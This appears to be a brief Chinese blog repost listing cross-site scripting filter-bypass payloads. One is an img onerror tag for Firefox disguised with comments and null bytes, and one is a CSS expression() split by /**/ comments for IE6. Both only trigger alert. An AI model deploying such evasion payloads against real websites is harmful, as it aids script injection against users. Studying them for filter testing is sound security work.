火狐下:
<img/srC="x"/*%00*/oneRror=/**/alert(1)/*%00*/>
IE6下:
样式表中的/**/会被浏览器忽略,因此可以运用/**/来注释字符,通过插入/**/来绕过过滤如下:
<img src="1" style="width: exp/**/re/**/ss/**/ion(alert(‘xss‘));">
标签:alert src 式表 插入 body idt 注释 字符 exp
标签:alert src 式表 插入 body idt 注释 字符 exp
原文地址:https://www.cnblogs.com/xxrens/p/8454219.html
